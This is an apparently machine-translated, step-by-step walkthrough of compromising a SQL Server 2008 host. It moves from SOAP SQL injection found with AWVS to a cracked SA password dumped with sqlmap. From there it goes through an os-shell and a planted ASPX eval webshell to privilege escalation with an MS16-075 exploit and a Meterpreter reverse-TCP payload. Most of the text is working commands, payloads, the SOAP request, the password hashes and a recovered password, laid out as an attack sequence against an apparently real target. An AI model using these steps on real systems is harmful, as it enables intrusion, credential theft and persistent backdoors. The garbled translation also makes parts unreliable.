Soap injects a sql2008 server in conjunction with MSF for power

1.1.1 Scan SOAP Injection vulnerability

1. Using the Web Services scanner in AWVS for vulnerability scanning

Open Awvs, select Web Services scanner for vulnerability scanning, 1, in the WSDL URL to fill in the destination URL address, note must be asmx?wsdl, there are asmx files, if not, you can fill directly, for example: Http://1**.* **.***.***:8081/?wsdl.

2. Handling SQL Blinds

With the AWVS Scan, verify that the URL address exists at the SQL Blind (26), in Awvs, click on the right "view HTTP Headers", copy its contents into a text file, and also handle the vulnerable statement, in this example: <urn:string >-1&apos; or 3*2*1=6 and 000223=000223 or &apos;gPireHft&apos;=&apos;</urn:string>

You need to replace the Red Word chart with " -1*".

3. The complete header package reads as follows:

Post/service1.asmx http/1.1

Content-type:text/xml

SOAPAction: "Http://tempuri.org/ZcpdList"

content-length:716

X-requested-with:xmlhttprequest

referer:http://1**.***.***.***:8081/?wsdl

host:1**.***.***.***:8081

Connection:keep-alive

Accept-encoding:gzip,deflate

user-agent:mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.21 (khtml, like Gecko) chrome/41.0.2228.0 safari/537.21

Accept: */*

<soap-env:envelope xmlns:soap-env= "http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap= "http// schemas.xmlsoap.org/wsdl/soap/"xmlns:xsd=" Http://www.w3.org/1999/XMLSchema "xmlns:xsi=" http://www.w3.org/1999/ Xmlschema-instance "xmlns:m0=" http://tempuri.org/"xmlns:soap-enc=" http://schemas.xmlsoap.org/soap/encoding/" Xmlns:urn= "http://tempuri.org/" xmlns:urn2= "Http://tempuri.org/AbstractTypes" >

<SOAP-ENV:Header/>

<SOAP-ENV:Body>

<urn:ZcpdList>

<urn:Inventory_dhs>

<urn:string>-1*</urn:string>

</urn:Inventory_dhs>

</urn:ZcpdList>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

Response

1.1.2 Confirm SOAP Injection Vulnerability

1. Using Sqlmap to detect the presence of a SQL injection vulnerability

Save the contents of the previous header as 1**.***.***.***.txt, copy the file to the directory where the sqlmap.py program is located, execute the command: Sqlmap.py-r 1**.***.***.***.txt, Confirm the information of the SQLMAP prompt:

Custom injection Marker (' * ') found in option '--data '. Does want to process it? [y/n/q] y

Soap/xml data found in POST data. Does want to process it? [y/n/q] y

as shown in 2, SQLMAP confirms that the SQL injection vulnerability exists and that the database server is Windows R2, and that the database version of SQL Server 2008,soap has a vulnerability to union query.

Figure 2 A SOAP injection vulnerability exists

2. See if the database has DBA authority

(1) Automatic submission of parameters for testing

3, execute command: sqlmap.py-r 1**.***.***.***.txt--is-dba--batch, but also two times to confirm Y, because the use of the parameter "batch", Sqlmap will automatically submit the judgment value.

Figure 3 Automatic submission of parameters for judgment

(2) The user who gets the current database is the DBA account.

As shown in 4, getting the current user in Sqlmap is the DBA, which displays the result as true. The result indicates that the database is using SA permissions and can be obtained through the Os-shell parameter. Webshell.

Figure 4 Determining if the DBA account is

3. Get the sa account password

As shown in 5, use the command sqlmap.py-r 1**.***.***.***.txt--password--batch to get the password value for all accounts connected to the database directly:

Figure 5 Obtaining the SA account password

4. Break the SA account password

The hash value of its database password was successfully obtained by SQLMAP in front:

[*] # #MS_PolicyEventProcessingLogin # # [1]:

Password hash:0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838

[*] # #MS_PolicyTsqlExecutionLogin # # [1]:

Password hash:0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c

[*] SA [1]:

Password Hash:0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28

The SA corresponding password value "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28" is checked in www.cmd5.com, and its decryption result is "qaz123wsx".

1.1.3 Get Webshell through--os-shell

1. Get Os-shell

Execute the command in Sqlmap: Sqlmap.py-r 1**.***.***.***.txt--os-shell, confirm the information in the Sqlmap execution window:

Custom injection Marker (' * ') found in option '--data '. Does want to process it? [y/n/q] Y

Soap/xml data found in POST data. Does want to process it? [y/n/q] Y

Do you want Sqlmap to try to optimize value (s) for DBMS delay responses (option '--time-sec ')? [y/n]

You can also perform sqlmap.py-r 1**.***.***.***.txt--os-shell--batch commands without manual input.

2. Find the directory where the Web application is located

(1) Viewing files and directories

After you execute the dir c: \ command, you can view the directories and files, and continue to see "dir c:\inetpub\wwwroot" 7, where there is no Web program to exclude the directory.

Figure 7 Viewing files and directories

(2) Get the real directory of the website

By looking at the C, D, E, and F drives, get the suspected website program files on the e-disk, and use the commands to view the Dir e:\software\ams_noflow,8.

Figure 8 Viewing Web site files

3. Testing the real-world Site Directory

(1) Generate file test

9, use the echo command: echo "thisis test" >e:\software\ams_noflow\t.txt to generate the T.txt file under the Web site root. The content is Thisis test.

Figure 9 Generating files

(2) Website Access test

Enter address Http://1**.***.***.***/1.txt in the browser to test, 10, get the content as expected, the directory is the real physical address of the site.

4. Get the Web. config profile contents

In Os-shell, execute the type e:\software\AMS_NoFlow\ The Web. config command looks at the contents of the Web. config file, and may not be able to view the full contents of the Sqlmap Command window due to setup problems, but sqlmap in its output directory, will keep the details, 11, open its log file, you can see its SA account corresponding password for QA Z123WSX, consistent with the SA password previously cracked.

Figure 11 Viewing the Web. config configuration file contents

5. Obtaining IP address information

As shown in 12, the ipconfig command in Os-shell can be used to obtain the IP address configuration of the target, which is externally configured with an independent extranet IP and an intranet IP address, and other commands may be executed in Os-shell.

6. Get Webshell Test

(1) Generate Shell file

Execute command in Os-shell: Echo ^<%@ page language= "Jscript"%^>^<%eval (request.item["Pass", "unsafe");%^> > E:\ Software\ams_noflow\cmd.aspx

As shown in 13, the Echo result shows 1, no additional information, and the surface-generated file command succeeds.

Figure 13 Generating Webshell

(2) Get Webshell

Use Chinese kitchen knife backdoor management tool, create record http://1**.***.***.***/cmd.aspx, a word backdoor password: pass,14, successful connection, successful acquisition Webshell.

1.1.4 conventional method of power failure

1. Generate System Information files

Execute commands in Os-shell: systeminfo > Syd1-0081dsb.txt

2. Download the Windows-exploit-suggester program

windows-exploit-suggester:https://github.com/gdssecurity/windows-exploit-suggester/

3. Update the vulnerability Library and make a vulnerability comparison

Perform windows-exploit-suggester.py-u updates in Python, while making a comparison of the vulnerability libraries:

windows-exploit-suggester.py--audit-l--database 2018-06-04-mssb.xls--systeminfo SYD1-0081DSB.txt > As shown in syd1-0081dsb-day.txt,15.

Figure 15 Vulnerability comparison

4. View vulnerability situation

In the C:\Python27 directory open syd1-0081dsb-day.txt file, 16, you can see that the program determines that the operating system is a Windows version R2, and there are multiple vulnerabilities, the latest vulnerability is ms16-075.

Figure 16 Viewing the vulnerability situation

5. The right to test the existence of loopholes

According to the vulnerability number, find and organize the exp file, on the target server to carry out the right to test, in addition to the MS16-075EXP, the test failed, unable to raise power.

1.1.5 ms16-075 right with MSF

1. Using MSF to generate bounce XXX

Execute the command under MSF:

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.33 lport=4433-f exe-o 4433.exe

Where the windows/meterpreter/reverse_tcp bounce port type, Lhost is the server IP address of the bounce connection, note that the IP address must be a standalone server, or must be an extranet port mapping, in other words, the bounce must be able to receive, Lport for the bounced port, 4433 for the generated program.

2. Execute the Listen command on the listener server

(1) Start MSF

Msfconsole

(2) Configuring Meterpreter parameters

Use Exploit/multi/handler

Set PAYLOAD windows/meterpreter/reverse_tcp

Set Lhost 192.168.1.33

Set Lport 4433

Exploit

3. Upload 4433.exe program to target server and execute

Upload the 4433.exe file to the target server and execute it via Chinese color knife or os-shell.

4. View System Information

As shown in 17, the target bounces to the listening server, executes SysInfo, and obtains its system information.

Soap injects a sql2008 server in conjunction with MSF for power